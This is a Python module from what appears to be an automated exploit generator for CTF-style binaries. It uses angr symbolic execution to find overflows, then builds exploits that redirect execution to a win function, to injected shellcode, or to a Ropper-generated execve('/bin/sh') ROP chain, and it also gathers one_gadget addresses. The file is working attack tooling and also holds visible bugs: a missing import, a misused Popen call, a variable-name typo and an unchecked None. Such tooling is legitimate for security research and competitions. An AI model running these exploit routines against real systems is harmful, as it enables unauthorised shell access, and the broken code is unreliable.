import angr
import claripy
import time
import timeout_decorator
import IPython
import r2pipe
import json
import os
import subprocess
from struct import pack
from angr import sim_options as so

# from pwn import *

from .simgr_helper import (
    point_to_win_filter,
    point_to_shellcode_filter,
    point_to_ropchain_filter,
)
from .radare_helper import getRegValues, findShellcode, get_base_addr

"""
' given n files, generate an execve rop chain and return it.
' I did not want to try and butcher ropper, so rs.createRopChain
' returns python code to print the rop chain to stdout
' I run it and steal the "rop" variable for my chain
'
' This is horrible code, do not repeat my mistakes
    'badbytes': ''.join(bad_bytes),
"""


def getRopchain(properties, bad_bytes):
    options = {
        "color": False,
        "badbytes": "".join(bad_bytes),
        "all": False,
        "inst_count": 6,
        "type": "all",
        "count_of_findings": 5,
        "cfg_only": False,
        "detailed": False,
    }

    rs = RopperService(options)
    print(properties["libc"])
    if "libc" in properties and properties["libc"] is not None:
        rs.addFile(properties["libc"])
    rs.addFile(properties["file"])
    rs.loadGadgetsFor()

    """Acceptable arches are formated differently than pwntools:
    x86
    x86_64
    ARM
    ... see https://github.com/sashs/Ropper/blob/a708fae670eece2b86daeaa276b38cb033eab231/README.md"""

    # These arches can span to mips and ppc
    arch = "x86"
    if "64" in properties["protections"]["arch"]:
        arch = "x86_64"
    elif "arm" in properties["protections"]["arch"].lower():
        arch = "ARM"

    # If you were looking for good programming examples, you've
    # come to the wrong place friend
    chain = rs.createRopChain("execve", arch, {"cmd": "/bin/sh"})

    if "Cannot create chain" in chain or "INSERT" in chain:
        print("[-] Failed to create rop chain. Try adding linked libraries")
        if "libc" not in properties or properties["libc"] is None:
            print("[~] Try adding linked libc")
        exit(0)

    namespace = {}
    exec(chain, namespace)  # rop variable created inside of "chain" python script
    if "libc" in properties:
        rs.removeFile(properties["libc"])
    rs.removeFile(properties["file"])

    return namespace["rop"]


"""
one gadget is writtin in ruby, so we need to call it externally
These are all offsets into libc
"""


def getOneGadget(properties):

    from subprocess import Popen, PIPE, STDOUT

    if "libc" not in properties or properties["libc"] is None:
        print("[-] One gadget RCE relies on libc. Please add libc")
        exit(0)
    if "libc_base" not in properties or properties["libc_base"] is None:
        print("[~] No libc base address specified. Chains will use 0x0 as base")

    # If installed using helper script, one gadget should be on $PATH
    one_gadget = Popen("one_gadget", properties["libc"], stdout=PIPE)
    lines = one_gadgets.stdout.communicate()[0].split("\n")

    gadget_addrs = []

    # Only grab the addresses
    for line in lines:
        if "/bin/sh" in line:
            print("[+] {}".format(line))
            gadget_addrs.append(line.split(" ")[0])

    return gadget_addrs


def exploitOverflow(binary_name, properties, inputType="STDIN"):

    # p = angr.Project(binary_name,load_options={"auto_load_libs": False})
    class hookFour(angr.SimProcedure):
        IS_FUNCTION = True

        def run(self):
            return 4  # Fair dice roll

    p = angr.Project(binary_name, load_options={"auto_load_libs": False})
    if p.loader.main_object.pic:
        print("Binary is PIC getting base addr")
        base_addr = get_base_addr(binary_name)
        p = angr.Project(binary_name, load_options={"auto_load_libs": False, 'main_opts': {'base_addr': base_addr}})
    extras = {so.REVERSE_MEMORY_NAME_MAP, so.TRACK_ACTION_HISTORY}
    p.hook_symbol("rand", hookFour())
    p.hook_symbol("srand", hookFour())

    # Setup state based on input type
    argv = [binary_name]
    input_arg = claripy.BVS("input", 300 * 8)
    if inputType == "STDIN":
        entry_addr = p.loader.main_object.entry
        reg_values = getRegValues(binary_name, entry_addr)
        state = p.factory.full_init_state(
            args=argv, add_options=extras, stdin=input_arg,env=os.environ,
        )
        # Just set the registers
        register_names = list(state.arch.register_names.values())
        for register in register_names:
            if register in reg_values:  # Didn't use the register
                state.registers.store(register, reg_values[register])

    elif inputType == "LIBPWNABLE":

        handle_connection = p.loader.main_object.get_symbol("handle_connection")
        start_addr = handle_connection.rebased_addr

        reg_values = getRegValues(binary_name, start_addr)

        state = p.factory.entry_state(
            args=argv,
            env=os.environ,
            addr=start_addr,
            add_options=extras,
            stdin=input_arg,
        )
        # state = p.factory.full_init_state(args=argv,env=os.environ,addr=start_addr,add_options=extras)

        # Just set the registers
        register_names = list(state.arch.register_names.values())
        for register in register_names:
            if register in reg_values:  # Didn't use the register
                state.registers.store(register, reg_values[register])

    else:
        argv.append(input_arg)
        state = p.factory.full_init_state(args=argv, add_options=extras)
    state.globals["user_input"] = input_arg

    state.libc.buf_symbolic_bytes = 0x100
    state.globals["inputType"] = inputType
    state.globals["properties"] = properties
    simgr = p.factory.simgr(state, save_unconstrained=True)

    step_func = pickFilter(simgr, properties)
    if step_func is None:
        print("[-] Error could not device exploit strategy")
        exit(1)

    run_environ = {}
    run_environ["type"] = None
    end_state = None
    # Lame way to do a timeout
    try:

        @timeout_decorator.timeout(1200)
        def exploreBinary(simgr):
            simgr.explore(find=lambda s: "type" in s.globals, step_func=step_func)

        exploreBinary(simgr)
        if "found" in simgr.stashes and len(simgr.found):
            end_state = simgr.found[0]
            run_environ["type"] = end_state.globals["type"]

    except (KeyboardInterrupt, timeout_decorator.TimeoutError) as e:
        print("[~] Overflow check timed out")

    run_environ["input"] = end_state.globals["input"]

    print("[+] Triggerable with input : {}".format(run_environ["input"]))
    return run_environ


def pickFilter(simgr, properties):

    if properties["win_functions"]:
        print("[+] Using point to win function technique")
        return point_to_win_filter
    elif not properties["protections"]["nx"]:
        print("[+] Binary does not have NX")
        print("[+] Placing shellcode and pointing")
        return point_to_shellcode_filter
    else:
        print("[+] Building rop and pointing")
        return point_to_ropchain_filter
    return None
